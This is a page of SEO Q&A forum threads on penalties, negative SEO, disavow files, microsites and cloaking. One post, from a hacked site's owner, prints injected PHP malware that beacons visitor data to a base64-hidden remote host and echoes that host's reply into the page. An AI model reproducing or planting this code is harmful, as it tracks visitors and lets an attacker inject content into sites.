
Welcome to the Q&A Forum

Browse the forum for helpful insights and fresh discussions about all things SEO.

Category: White Hat / Black Hat SEO

Dig into white hat and black hat SEO trends.


  • Basically, my web developer has suggested that instead of using a subfolder to create an English and a Korean version of the site, I should create two different websites and then link them together to provide each page in English or in Korean, whichever the case may be. My immediate reaction is that search engines may perceive this kind of linking as manipulative; as you can imagine, there will be a lot of links (one for every page). Do you think it is OK to create two websites and link them together page by page? Or do you think the site will get penalized by search engines for link farming or link exchanging? (See the markup sketch below this question.) Regards, Tom

    | CoGri
    0
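
    If the two language versions do end up on separate hosts, the standard way to connect them is not page-by-page body links but rel="alternate" hreflang annotations, which tell search engines the pages are translations of one another rather than a link exchange. A minimal sketch, assuming hypothetical example.com / example.co.kr hosts:

        <!-- in the <head> of the English page; the Korean page carries the same pair -->
        <link rel="alternate" hreflang="en" href="https://www.example.com/products/" />
        <link rel="alternate" hreflang="ko" href="https://www.example.co.kr/products/" />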

  • Hi guys, I was hoping someone could help me with a problem that has arisen on the site I look after. This is my first SEO job and I've had it about 6 months now. I think I've been doing the right things so far: building quality links from reputable sites with good DA, working with bloggers to push our products, and only signing up to directories in our niche. So our backlink profile is very specific, with few spammy links. Over the last week, however, we have received a huge increase in backlinks which has almost doubled our linking domains total. I've checked the links out in Webmaster Tools and they are mainly directories or webstat websites like these: siteinfo.org.uk, deperu.com, alestat.com, domaintools.com, detroitwebdirectory.com, ukdata.com, stuffgate.com. We've also just launched a new initiative where we will be producing totally new, good-quality content 4-5 times a week, and many of these new links point to that page, which looks very suspicious to me. Does this look like negative SEO to anyone? I've read a lot about the disavow tool and opinions seem split on when to use it, so I was wondering if anyone had advice on whether to use it or not (see the file-format sketch below this question). It's easy for me to identify these new links, yet some of them have decent DA, so will they do any harm anyway? I've also checked the referring anchors on Ahrefs, and now over 50% of my anchor term cloud is terms totally unrelated to my site, all from the last week, which also worries me. I haven't seen any negative impact on rankings yet, but if this carries on it will destroy my link profile. So would it be wise to disavow these links as they come through, or wait to see if they actually have an impact? It should be obvious to Google that there has been a huge spike in links, so the question is whether they will be ignored or whether I will be penalised. Any ideas? Thanks in advance, Richard

    | Rich_995
    0
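
    For anyone weighing the disavow question above: the file Google accepts is plain text, one URL or one domain: rule per line, with # for comments. A minimal sketch using hypothetical domains:

        # spammy webstat and directory domains, first seen this week
        domain:example-webstats.com
        domain:example-directory.co.uk
        # one bad page rather than a whole domain
        http://example-blog.com/spun-post-123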

  • I have a domain, let's say mydomain.com, which already hosts my web app. I want to create a sub-product from my company; the concept is a bit different from my original web app on mydomain.com, and I am planning to host it on mynewapp.mydomain.com. I have doubts about whether using a subdomain will have an impact on my existing or new web app. Can anyone give me any pointers on this? As much as I wanted to use a directory, mydomain.com/mynewapp, this is not possible because it would just confuse existing users of the new product/web app. I've heard that subdomains are essentially treated as a new site; is this true? If it is, then I am fine with that, but is it also true that it is harder for a subdomain to reach the top rank than for a root domain?

    | herlamba
    0

  • Hello dear Moz community, I have raised this problem before, but now it has reached a level where I have to make some hard decisions, and I would like your help. One of our new accounts (1 month old) got a manual penalty notification from Google a few weeks ago for unnatural link building. I went through the whole process, did link detox and analysis, and indeed there were lots of blog networks existing purely for cross-linking. I removed these and the link count decreased dramatically. The company had around 250,000 links and, truth be told, if I go by the book only 700-800 of them really provide value. They will end up with roughly 15,000-20,000 left, which I acknowledge is a lot, but some are coming from Web 2.0 properties such as Blogger, WordPress, etc. Because the penalty was on some of the pages and not the whole website, I removed the links that I identified as harming the site, brought the anchor text down to normal levels, and filed a very detailed reconsideration request and disavow file. I have no response from Google's webmaster team so far, but here is where my concerns begin: Should I go for a new domain, losing 230,000 links? How can there even be a "reconsideration" request for a website with 85% of its link profile being cross-linking to self-owned directories and Web 2.0 properties? If I go for a new domain, should I redirect? Or should I keep the domain, keep cleaning, and keep adding new quality links, taking it forward with a fresh approach? Thanks everyone in advance!

    | artdivision
    0

  • Today we found out that one of our websites has been hacked and that this code was injected into multiple index.php files:

    if (!isset($sRetry))
    {
        global $sRetry;
        $sRetry = 1;
        // This code use for global bot statistic
        $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google search bot
        $stCurlHandle = NULL;
        $stCurlLink = "";
        // Fires only when the user agent matches none of the common browsers or crawlers
        if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false)
            && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
            && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
            && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
            && (strstr($sUserAgent, 'bot') == false)) // Bot comes
        {
            if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) { // Create bot analitics
                // The base64 string decodes to http://mbrowserstats.com/statH/stat.php, so the
                // visitor's IP, user agent, host and path are reported to a remote server
                $stCurlLink = base64_decode('aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw')
                    . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                    . '&useragent=' . urlencode($sUserAgent)
                    . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                    . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                    . '&check=' . isset($_GET['look']);
                @$stCurlHandle = curl_init($stCurlLink);
            }
        }
        if ($stCurlHandle !== NULL)
        {
            curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
            curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 8);
            $sResult = @curl_exec($stCurlHandle);
            // If the remote reply starts with "O" (an OK marker), blank that byte and
            // echo whatever the remote server returned straight into our page
            if ($sResult[0] == "O")
            {
                $sResult[0] = " ";
                echo $sResult; // Statistic code end
            }
            curl_close($stCurlHandle);
        }
    }
    ?>

    After some searching I found other people mentioning this problem too. They were also saying that this could have an impact on your search rankings. My first question: will this hurt my rankings? Second question: is there something I can do to tell the search engines about the hack so that we don't lose rankings over this? Regards, Ard

    | GTGshops
    0

  • Hi All, On the site www.myworkwear.co.uk we have an externally hosted site search that also creates separately hosted pages of popular searches, which rank in Google and bring in traffic. An example is below: Google search: blue work trousers (appears on the front page of Google). Site Champion page: http://workwear.myworkwear.co.uk/workwear/Navy%20Blue%20Work%20Trousers Nearest category page: http://www.myworkwear.co.uk/category/Mens-Work-Trousers-936.htm Could this be a penalisation or duplication factor? Could these be interpreted as a dodgy link factor? Thanks in advance for your help. Kind Regards, Andy Southall

    | MarzVentures
    0

  • Hi all, After watching our ranking for some primary keywords drop on Google from page 1 to page 20 and then totally off the charts in a relatively short period, I've recently discovered through Moz tools that our website, along with other competitor sites, is the victim of negative link building (I may have the terminology wrong). Two primary anchor terms are linked to our domain (www.solargain.com.au), being "sex" and "b$tch", through over 4,000 compromised sites, mostly WordPress, many of them high-profile. Searching through the source code of half a dozen compromised sites, I noticed that competitors are also linked using other derogatory terms, and the patterns indicate batch or clustered processing. The hacker has left some evidence as to whom they are representing, as I can also see among the links some credible discussion forums which contain negative feedback on one particular supplier. Although this is pretty good evidence for why our ranking has dropped, there are some interesting questions: A) Is there any way to rectify the 4,000 or so bad links, by mass removal or otherwise? (It doesn't sound feasible.)
    B) Some competitors who dominate organic ranking through better optimization don't seem to be affected, or at least not as much as our site, which raises the question of how much of our drop is a direct result of this hack.
    C) Is there any action or support for industrial espionage?
    D) Can you request that Google ignore the inbound links, and wouldn't they have a duty of care to do so? I'm fairly new to this ugly side of the Internet and would like to know how to approach recovery and moving forward. Thoughts and ideas very welcome. Thanks in advance.

    | mannydog
    0

  • We disavowed 80% of our backlink profile due to our last SEO building cheap, nasty links, and filed a reconsideration request (we had the Google Webmaster Tools "notice of detected unnatural links to http://www.xxx.co.uk" penalty for a year, from the 24th of March 2012, but thought it best to clean up before round 2 – even though we had no real ranking penalty, and we did some decent link building that moved us up). We then received a successful penalty-lifted note (on the 22nd of May 2013), but our rankings dropped (due to the crap links that had been propping us up). Since then we have built a fair few high-quality links, but our rankings do not seem to be moving much, if at all (7 weeks clear now). Has anyone had any experience with the above? Are we in a sandbox-type situation? Thank you for your time. Thanks, Bob

    | BobAnderson
    0

  • Howdy Moz, Over and over we hear of folks using microsites in addition to their main brand for targeting keyword-specific niches. The main concern most folks have is either duplicate content or being penalized by Google, which is also our concern. However, in one of our niches we notice a lot of competitors have set up secondary websites to rank in addition to the main website (basically to take up more room on the SERPs). They are currently utilizing different domains, on different IPs, on different servers, etc. We verified this by calling: they all rang through to the same competitors. So our thought was, why not take the fight to them (so to speak), but with a branding and content strategy? The company has many good content pieces that we can utilize, like company mottos, mission statements, special projects, and community outreach, that can be turned into microsites with unique content. Our strategy idea is to take a company called "ACME Plumbing" and brand for specific keywords with locations, like sacramentoplumberwarranty.com, where the site's content revolves around plumber warranty info, measures of a good warranty, plumbing warranty news (newsworthy issues), blogs, RCS - you get the idea - and send both referral traffic and links to the main site. The idea is to then repeat the process with another company aspect, like napaplumbingprojects.com, where the content of the site is focused on cool projects, images, RCS, etc., again referring traffic and link juice to the main site. We realize that this adds to the amount of RCS that needs to be done, but that's exactly why we're here. Also, any thoughts on intentionally tying the brand to the location so you get URLs like acmeplumbingsacramento.com?

    | AaronHenry
    1

  • Hi, We are considering using separate servers for when a bot vs. a human lands on our site, to prevent overloading our servers. Just wondering if this is considered cloaking if the content remains exactly the same for both the bot and the human, just served from different servers (see the proxy sketch below this question). And if this isn't considered cloaking, will it affect the way our site is crawled? Or hurt rankings? Thanks

    | Desiree-CP
    0
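
    On the bot-vs-human question above: as long as both pools serve byte-identical content, the split is normally done at the reverse proxy rather than in application code. A minimal sketch, assuming a hypothetical nginx front end and upstream addresses (not a statement on how Google classifies it):

        # route known crawlers to their own pool; both pools serve identical content
        map $http_user_agent $pool {
            default                      human_pool;
            ~*(googlebot|bingbot|slurp)  bot_pool;
        }
        upstream human_pool { server 10.0.0.10; }
        upstream bot_pool   { server 10.0.0.20; }
        server {
            listen 80;
            location / {
                proxy_pass http://$pool;
            }
        }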

  • As a web developer, it's not uncommon for me to place a link in the footer of a website to give myself credit for the web design/development. I recently decided to go back and nofollow all these site-wide footer links to avoid looking potentially spammy (see the snippet below this question). Should I remove these links altogether and just give myself a text credit without a link at all? I would like a potential client who is interested in my work to still be able to get to my site, but I want to keep my link profile squeaky clean. Thoughts?

    | brad.s.knutson
    0
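
    For reference on the footer-credit question above, the nofollow variant keeps the link clickable for humans while asking engines not to count it. A one-line sketch with a hypothetical URL:

        <a href="https://www.example-webdesign.com/" rel="nofollow">Site by Example Web Design</a>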

  • As per the title, has anyone used them? Their reviews all sound really positive (if they're real). The system sounds like an auto-submitting backlink generator - which can't be good?

    | FDFPres
    0

  • We are a small company competing for traffic in an industry with more or less one other, very large, brand. I'm noticing we are getting a decent amount of organic traffic for the competitor's brand name, even though I haven't done any on-page inclusion or link building for the term. We are using their brand as a keyword in our paid campaigns and seeing potential. I firmly believe we have a superior product. I'm tempted to start going after our competitor's brand as a keyword to skim some of their traffic. My question is: how far is too far? Do I actively try to obtain a few anchor-text-specific backlinks? Dare I use their brand name as a term on our page? Maybe a simple blog post comparing our two products is more appropriate? Any suggestions are appreciated.

    | CaliB
    0

  • A client currently has a domain of johnsmith.com (not the actual site name, of course). I'm considering splitting this site into multiple domains, which will include the brand name plus a keyword, such as: Johnsmithlandclearing.com Johnsmithdirtwork.com Johnsmithdemolition.com Johnsmithtimercompany.com Johnsmithhydroseeding.com johnsmithtreeservice.com Each business is unique enough, and each will cross-link to the others. My questions are: 1) Will Google consider the cross-linking spammy? 2) What happens to johnsmith.com? Should it redirect to the new site with the largest market share, or should it become an umbrella for all? 3) Any pitfalls foreseen? I've done a fair amount of due diligence and feel these separate domains are legit, but am paranoid that Google will not see it that way, or may change direction in the future.

    | SteveMauldin
    0

  • Prior to the most recent Google update, we noticed our microsites were indexing very well. The intent of these microsites was not to build link popularity for the primary sites, but simply to show up as additional results within search. However, with the most recent Google update, we see the microsites are not indexing very well. And given the suggestion from Google that microsites should be avoided - with the potential that the primary site be penalized if they are not - it appears those microsites should be pulled down. But on Bing/Yahoo, these microsites are still indexed, and indexed very well. So this begs the question: are microsites worthwhile? Do we think Bing/Yahoo will follow suit? Is it beneficial to perhaps tell Googlebot to ignore the microsites while allowing Bing and Yahoo to index them (see the robots.txt sketch below this question)? Looking for some thoughts here...

    | AltMediaStudios
    0
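
    Blocking only Googlebot, as the question above asks, is mechanically simple in robots.txt; whether it is wise is the real debate. A minimal sketch (the specific Googlebot group overrides the catch-all, and Yahoo's crawler, Slurp, falls under *):

        User-agent: Googlebot
        Disallow: /

        User-agent: *
        Disallow:

    Note that robots.txt only blocks crawling; a blocked URL can still appear in the index if other sites link to it.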

  • So I have a site that currently has a partial-match penalty from Google, and I have been working to get it removed. Bad SEO: basically, my site was submitted to a bunch of bad blog networks. Hopefully the penalty gets lifted soon as we remove and disavow links. That said, I was planning on moving a portion of my site to a new site, since it's not really the focus of the site anymore but still pays the bills. I have also been building it into more of a network of sites. So if I do that and 301 redirect the pages I moved, will the penalty carry over? On the current site I planned on using rel="nofollow" on any links that I may change in the header/menus, etc. Some of these pages I believe have the penalty, while others don't. I really just don't want to screw anything up more than it already is. My biggest fear is that it's perceived as a black hat method or something like that. Any thoughts?

    | dueces
    0

  • Hi, I have heard that Penguin penalizes a site for bad backlinks. Do you think that is true? Do you think it is possible for someone to penalize my website by adding my link to some spam websites? I'm worried that someone could do it...

    | darkanweb
    0

  • I recently noticed a large number of backlinks from low-authority directories coming in for one of my clients. These links were either purchased by a competitor or created by a directory-service site that knows we might be willing to pay to have bad links removed. I've contacted the website admin and they require a payment of $0.30 per link to have them removed from their directory. Has anyone had a similar experience? I'm also considering using the disavow tool, but I've heard the outcome of using this tool is usually bad. I'd appreciate any feedback, thanks!

    | Leadhub
    1

  • I am giving a presentation in a few weeks and am looking for a "what not to do" example of a larger brand that made poor SEO choices and tried to game Google with black hat tactics. Any examples you can point me to?

    | jfeitlinger
    0

  • Hi there, I recently checked the backlinks for my site using Open Site Explorer, and I noticed a huge number of bad backlinks which I believe a competitor might be building to lower my ranking for a number of highly competitive keywords. Besides spending time disavowing these links, what else can be done? Has anyone else faced the same problem? Any help would be appreciated.

    | bamcreative
    0

  • Hello everybody, I've been working as an in-house SEO for nearly a year and a half now, and I've gotten some pretty great results. Two years ago our site was on the second page for the most important keywords in our niche, and with a lot of work we've managed to get top-5 rankings for most keywords and even the number 1 spot for the most important ones. I've been using Open Site Explorer to track backlinks, and today I noticed that a lot of links were discovered in the last week from websites that I did not recognize. Most URLs won't even load properly because each "blog post" has over a thousand comments. It took me a couple of tries to even find one that loaded properly and to find the link to our website, but it was really there. There haven't been any drops in our rankings, but I'm worried about a possible spam penalty. I know that I can use the disavow tool to at least disavow the links from these domains, but is that really the only thing I can do? Furthermore, these are just the links that Open Site Explorer picked up; who knows how many more are out there. For any of you questioning whether I did this to myself: I'm no saint, but I'm definitely not stupid enough to buy these kinds of links. Any help would be highly appreciated.

    | Laurensvda
    0

  • So I have a theory that Google "grandfathers" in a handful of old websites in every niche, and that no matter what such a site does, it will always have the authority to rank high for the relevant keywords in the niche. I have a website in the crafts/cards/printables niche. One of my competitors is http://printable-cards.gotfreecards.com/ This site ranks for everything... http://www.semrush.com/info/gotfreecards.com+(by+organic) Yet when I visit their site, I notice duplicate content all over the place (extremely thin content, if anything at all, on some pages that rank for highly searched keywords), paginated pages that should be noindexed, bad URL structure, and an overall unfriendly user experience. Also, the backlink profile isn't very impressive, as most of the good links come from their other site, www.got-free-ecards.com. Can someone tell me why this site is ranking for what it is, other than the fact that it's around 5 years old and potentially has some type of preference from Google?

    | WebServiceConsulting.com
    0

  • I am looking to go after sites that are not, and never will be, affected by Penguin/Panda updates. Is there a tool or a general rule of thumb for how to avoid the affected sites? Is there a method anyone is currently using to get good, natural links post-Penguin 2.0?

    | dsinger
    0

  • Does anyone have more information about this directory? Is it a good-quality directory that I should pay to get listed on?

    | EcomLkwd
    0

  • We picked up a client who, before us, was using link building as their only SEO strategy. They came to us for on-page SEO and overall guidance. We have done some targeted link building and worked with their link-building company to remove some links; however, after doing some further digging, I'm wondering if we still have some bad links. My reasoning: all the pages we have done on-page SEO work on are getting A grades in Moz (which is our backup check), and the RD and PA figures for many of the pages we have focused on are higher than those of the pages that rank on the first page. Any suggestions?

    | SocialB
    1

  • Hi, I found a lot of information about responsive design and SEO, but mostly theories and no real experiments, so I'd like to find a clear answer if someone has tested this. Google says:
    Sites that use responsive web design, i.e. sites that serve all devices on the same set of URLs, with each URL serving the same HTML to all devices and using just CSS to change how the page is rendered on the device
    https://developers.google.com/webmasters/smartphone-sites/details For usability reasons you sometimes need to hide content or links completely (not accessible at all to the visitor) at small resolutions (mobile) using CSS ("visibility:hidden" or "display:none"); see the sketch below this question. Is this counted as hidden content that could penalize your site, or not? What do you do when you create responsive websites? Thanks! GaB

    | NurunMTL
    0
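
    The pattern the question above is asking about looks like the following (a minimal sketch; whether engines treat it as penalizable hidden content is exactly the open question):

        /* hide a secondary block on small screens only */
        @media (max-width: 767px) {
            .secondary-nav {
                display: none;
            }
        }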

  • Here is the email my sales rep received today (what can we do to combat this?):

    From: Jaqueline carol [mailto:[email protected]]
    Sent: Wednesday, September 11, 2013 12:57 AM
    To:
    Subject: I NEED your help - PLEASE

    Hi, Due to the latest GoogIe update we are working on cleaning up the links to our website . There fore we would like to kindly ask you to remove our link from your page. link details: URL: We believe that it would help both sides to rank up higher in Google and not get penalized during the future Google updates. Please remove my link at the earliest and notify me about the same. Thank you for your cooperation. Best Regards, Jaquelinecarol

    | pbhatt
    1

  • We have a few charity events coming up that have offered to link back to our homepage. While we genuinely like the charities we are going to sponsor, I'm not sure how those links will look SEO-wise. For example, one is for the local high school basketball team and another is for a Pediatric Care Mud Run. To a human, these links make perfect sense, but I'm not sure a robot can differentiate them from spammy or negative links. Granted, I understand that a small percentage of links probably won't do much either way, but I'd like to ignore that for the purposes of my question. All things being equal, do links such as these help or hurt? Thanks for your time and insight, Ruben

    | KempRugeLawGroup
    0

  • Hello all, So I have a website that was hit hard by Panda back in November 2012, and ever since, the traffic continues to decline week by week. The site doesn't have any major Moz errors (aside from too many on-page links). The site has about 2,700 articles, and the text-to-HTML ratio is about 14.38%, so clearly we need more text in our articles and we need to ease off a little on the number of pictures/links we add. We have increased the text-to-HTML ratio for all of our new articles, but I was wondering how beneficial it would be to go back and add more text content to the 2,700 old articles that are just sitting there. Would this really be worth the time and investment? Could it help the drastic decline in traffic and maybe even turn it into growth?

    | WebServiceConsulting.com
    0

  • It seems like the more I learn about my competition's links, the less I understand the penalties associated with paid links. Martindale-Hubbell (in my industry) basically sells links to every lawyer out there, but none of the websites with those links are penalized. I'm sure you all have services like that in your various industries. Granted, Martindale-Hubbell is involved in the legal community and is tied to LexisNexis, but any small amount of research would tell you that paid links are a part of their service. Why do this company (and the companies that use them) not get penalized? Did the Penguin update just go after companies that got links from really seedy foreign operations with gambling/porn/medication link profiles? I keep reading on this forum and elsewhere that paid links are bad, but it looks to me like there are fundamental differences in the penalties for paid links purchased from one company vs. another. Is that the case, or am I missing something? Thanks, Ruben

    | KempRugeLawGroup
    0

  • Hello, My website, www.coloringbookfun.com, is very old and authoritative, but the URL structure is terrible. If you check out some of our subcategories, such as http://www.coloringbookfun.com/Kung Fu Panda and individual printables such as http://www.coloringbookfun.com/Kung Fu Panda/imagepages/image2.html you can see that they aren't optimized. I am curious about the pros and cons of fixing the URL structure and 301ing the old URLs to the new, optimized ones. Will 301ing lose authority and backlinks for the site's pages? Does optimizing the URL structure outweigh the potential loss of authority/backlinks?

    | WebServiceConsulting.com
    0

  • We had the PayDay hack - and solved it completely. The problem is, the SERPs still show over 3,000 URLs pointing at 404s on our website, all with URLs like this: www.onssi.com/2012/2/post1639/payday-loan-companies-us What should I do? Should I disavow every one of the 3,000? Nofollow them?

    | Ocularis
    0

  • It's generally not too hard to rank in Google Places and organically for your primary location. However, if you are a service-area business looking to rank for neighboring cities or service areas, Google makes this much tougher. Andrew Shotland mentions the obvious and not-so-obvious options: service-area pages ranking organically, getting a real/virtual address, boosting geo signals, and using zip codes instead of a service-area circle. But I am wondering if anyone has had success with other methods? Maybe you have used geo-tagging in a creative way? This is a hurdle that many local businesses are struggling with, and any experience or thoughts will be much appreciated.

    | vmialik
    1

  • Hi, When you search for "business plan software" on google.co.uk, 7 of the first 11 results come from 1 company selling 2 products, see below: #1. Government site (related to "business plan" but not to "business plan software")
    #2. Product 1 from Palo Alto Software (LivePlan)
    #3. bplan.co.uk: content site of Palo Alto Software (relevant to "business plan" but only relevant to "business plan software" because it features and links to their Product 1 and Product 2 sites)
    #4. Same site as #3 but a different URL
    #5. Palo Alto Software Product 2 (Business Plan Pro) page on the Palo Alto Software .co.uk corporate site
    #6. Same result as #5 but a different URL (the features page)
    #7. Palo Alto Software Product 2 (Business Plan Pro) local site
    #8, #9 and #10 are OK
    #11. Same as #3 but the .com version instead of the .co.uk This seems wrong to me, as it creates an illusion of choice for the customer (especially because they use different sites), whereas in reality the results showcase only 2 products. Only 1 of Palo Alto Software's competitors is present on page 1 of the search results (the rest are on pages 2 and 3). Have some of you experienced a similar issue in a different sector? What would be the best way to point it out to Google? Thanks in advance, Guillaume

    | tbps
    0

  • Hey, we are redesigning the site and changing a lot of URLs to make them more SEO-friendly, but some of the old URLs have PR 4-5. What is the best way to go about this? How do you do a 301 redirect for specific pages in ASP.NET (see the config sketch below this question)? Or do you recommend something else? Thanks in advance

    | Madz
    0
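
    One common way to 301 specific pages on IIS 7+ (the usual ASP.NET host) is the httpRedirect element in web.config, scoped with a location block. A minimal sketch with hypothetical paths:

        <configuration>
          <!-- permanent (301) redirect for one legacy page -->
          <location path="old-page.aspx">
            <system.webServer>
              <httpRedirect enabled="true" destination="/new-seo-friendly-page" httpResponseCode="Permanent" />
            </system.webServer>
          </location>
        </configuration>

    For redirects decided in code, .NET 4.0+ also offers Response.RedirectPermanent(), which issues a 301 rather than the default 302.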

  • If you have massive numbers of pages with super-thin content (such as pagination pages) and you noindex them (see the tag below this question), once they are removed from Google's index - and if these pages aren't viewable to the user and/or don't get any traffic - is it smart to remove them completely (404?), or is there any valid reason to keep them? If you noindex them, should you keep all the URLs in the sitemap so that Google will recrawl and notice the noindex tag? If you noindex them and then remove them from the sitemap, can Google still recrawl and recognize the noindex tag on its own?

    | WebServiceConsulting.com
    0
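
    The tag the question above refers to sits in the head of each thin page; the follow directive keeps link equity flowing even while the page drops out of the index:

        <meta name="robots" content="noindex, follow">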

  • I have a question I hope people can help me with. My intention for my next project is to focus on domain authority and a small number of high-quality links. I have a couple of scenarios I would appreciate some advice on: 1. Can lower-quality links lower domain authority? 2. Would you avoid links from low-quality sites no matter what, and what domain authority levels should you avoid links from? 3. Should I be looking at the link profiles of the sites I get links from? Does it matter if a site I get a link from has thousands of spammy links (i.e. something to look out for when doing guest blogging)? 4. Should I avoid directories no matter what, or are high-PR / high-domain-authority directories OK to use, if I end up on a page of other relevant directory submissions related to my niche? Essentially, my aim is to have high-quality links, but equally, there are some decent sites on the fringes that I will need to consider (based on a competitor's link profile I researched).

    | Jonathan1979
    0

  • The site is https://virtualaccountant.ie/ It's a really small site. They have only about 7 backlinks, they don't blog, they don't have a PPC campaign, and they don't stand out from the crowd in terms of the products or services offered. So why are they topping the SERPs for difficult-to-rank-for accounting keywords such as "accountant" and "online accounts"? What are they doing better than everyone else, or have they discovered a way to cheat Google - and, worse still, me?

    | PeterConnor
    0

  • I can't imagine this is a white hat SEO technique, but they don't seem to be punished for it by Google - yet. How does Google treat the use of your competitors' names in your meta keywords/descriptions? Is it a good idea?

    | PeterConnor
    0

  • I have neglected to add alt tags to one of my sites and am ready to tackle the project. I want to make sure I do not do something that will have a negative impact on rankings, and I have not been able to find info that fits my situation. The pics are all about a product I make and sell through the site. I have a free gallery section with about 10 galleries of about 20 pics each. Each gallery page has a different model and/or context of how the product might be used. These are not sales pages directly, just thumbnail galleries linked to larger images for the viewer's enjoyment. I have 10 or so keyword phrases that would be good to use, with the intent of getting listed in Google Images and picking up other ranking enhancements. Can I choose one keyword phrase as the alt tag for a whole gallery and give each individual large pic in that gallery the same alt tag, using a different phrase for the next gallery's pics, etc.? Or is that considered stuffing, so that I would have to come up with a different phrase for each pic (see the sketch below this question)? I hope that makes sense. Thanks, Galen

    | Tetruss
    0
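
    On the gallery question above: repeating one exact phrase across twenty images is the pattern that tends to read as stuffing, while keeping the gallery's theme but describing each image individually is the safer shape. A hedged sketch with hypothetical filenames and a hypothetical product:

        <!-- same gallery theme, but each alt describes its own image -->
        <img src="gallery-3/img-01.jpg" alt="Hanging chair on a shaded porch, side view">
        <img src="gallery-3/img-02.jpg" alt="Model relaxing in a hanging chair beside a garden pond">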

  • Hi there, through Open Site Explorer I've found 5838 links (across 1458 domains) with the anchor text 'new porn' pointing to a site I manage. Someone's been busy! Most (99.5%) appear to be created as Pingbacks with rel="nofollow" on them. As a precaution I submitted a file through the Google Disavow tool which has had the status "You successfully uploaded a disavow links file" for the last month. I'm wondering whether I should be concerned, or whether Google and other search engines will be clever enough to know this site is about electricity and not scantily clad people?

    | originenergy
    0

  • My question is about how to syndicate content correctly. Our site has professionally written content aimed at our readers, not search engines. As a result, other related websites are looking to syndicate our content. I have read the Google duplicate content guidelines (https://support.google.com/webmasters/answer/66359?hl=en), canonical recommendations (https://support.google.com/webmasters/answer/139066?hl=en&ref_topic=2371375), and noindex recommendations (https://developers.google.com/webmasters/control-crawl-index/docs/robots_meta_tag) offered by Google, but am still a little confused about how to proceed. The pros in our opinion are as follows: #1 We can gain exposure to a new audience as well as help grow our brand. #2 We figure it's also a good way to build credible links and help our rankings in Google. Our initial reaction is to have the partners use a canonical link to assign the content back to us, and also implement a "noindex, follow" tag to help avoid duplicate content issues (see the sketch below this question). Are we doing this correctly, or are we potentially in danger of violating some Google quality guideline? Thanks!

    | Dirving4Success
    0
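
    The combination described above would look like this in the head of the syndicated copy on the partner site (hypothetical URL; the noindex line is the stricter, optional second step the poster mentions):

        <link rel="canonical" href="https://www.example.com/original-article" />
        <meta name="robots" content="noindex, follow">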

  • Hi All, I'll premise this by saying that we like to engage in as much white hat SEO as possible. I'm certainly not asking for any shady advice, but we have a lot of local pages to optimize :). So, we are an IT and management training course provider. We have 34 locations across the US, and each of our 34 locations offers the same courses. Each of our locations has its own page on our website. However, in order to really hone the local SEO game by course topic area and city, we are creating dynamic custom pages that list our course offerings/dates for each individual topic and city. Right now, our pages are dynamic and being crawled and ranking well within Google. We conducted a very small-scale test of this in our Washington DC and New York areas with our SharePoint course offerings, and it was a great success: we are ranking well for "sharepoint training in new york/dc" etc. with two custom pages. So, with 34 locations across the states and 21 course topic areas, that's well over 700 pages of content to maintain - a LOT more than just the two we tested. Our engineers have offered to create a standard title tag, meta description, h1, h2, etc., but with some varying components. This is from our engineer specifically: "Regarding pages with the specific topic areas, do you have a specific format for the meta description and the custom paragraph? Since these are dynamic pages, it would work better and be a lot easier to maintain if we could standardize a format that all the pages would use for the meta and paragraph. For example, if we made the paragraph: 'Our [Topic Area] training is easy to find in the [City, State] area.' As a note, other content such as directions and course dates will always vary from city to city, so content won't be the same everywhere, just similar. It works better this way because HTFU is actually a single page, and we are just passing the venue code to the page to dynamically build it based on that venue code. So they aren't technically individual pages, although they seem like that on the web. If we don't standardize the text, then someone will have to maintain custom text for all active venue codes for all cities for all topics. So you could be talking about over a thousand records to maintain, depending on what you want customized. Another option is to have several standardized paragraphs, such as: 'Our [Topic Area] training is easy to find in the [City, State] area.' followed by other content specific to the location, or
    'Find your [Topic Area] training course in [City, State] with ease.' followed by other content specific to the location. Then we could randomize what is displayed. The key is to have a standardized format so additional work doesn't have to be done to maintain custom formats/text for individual pages." So, Mozzers, my question to you all is: can we standardize with slight variations specific to each location and topic area without getting dinged for spam or duplicate content (see the sketch below this question)? Often I ask myself, "If Matt Cutts were standing here, would he approve?" For this, I am leaning towards "yes," but I always need a gut check. Sorry for the long message. Hopefully someone can help. Thank you! Pedram

    | CSawatzky
    1
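
    A minimal PHP sketch of the engineer's rotation idea (names and template strings hypothetical). Choosing the variant deterministically from the topic and venue, rather than at random per request, keeps each page stable between crawls:

        <?php
        // A few standardized intro templates with positional placeholders.
        $templates = [
            'Our %1$s training is easy to find in the %2$s area.',
            'Find your %1$s training course in %2$s with ease.',
        ];

        // Pick the same template for the same topic + city every time.
        function introParagraph(string $topic, string $cityState, array $templates): string
        {
            $i = crc32($topic . '|' . $cityState) % count($templates);
            return sprintf($templates[$i], $topic, $cityState);
        }

        echo introParagraph('SharePoint', 'New York, NY', $templates);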

  • Hi all, This is now popping up in Moz after we've used this approach for over 6 months:
    it is saying these pages are now duplicate site content. What do we think? Is this a bad strategy? It works well in the SERPs, but could it be damaging the root domain's ranking? I guess this is a little shady. http://www.tomlondonmagic.com/area/close-up-magician-in-crowborough/ http://www.tomlondonmagic.com/area/close-up-magician-in-desborough/ http://www.tomlondonmagic.com/area/close-up-magician-in-didcot/ Thanks.

    | TomLondon
    0

  • Hi guys :). I am asking for your help - I would like to know the best way to set all of this up. Basically, I have two main (e-commerce) sites and a few other big web properties. What I would like to know is whether it is OK to link the main sites to my real G+ account and use alias G+ accounts for the other web properties, or is that a kind of spamming? The thing is, I use a G+ account for those e-commerce sites and would not necessarily want the other web properties to be linked to the same G+ account, as they are not really related. I do hope I was clear. Any insight would be appreciated. Thanks.

    | sumare
    0

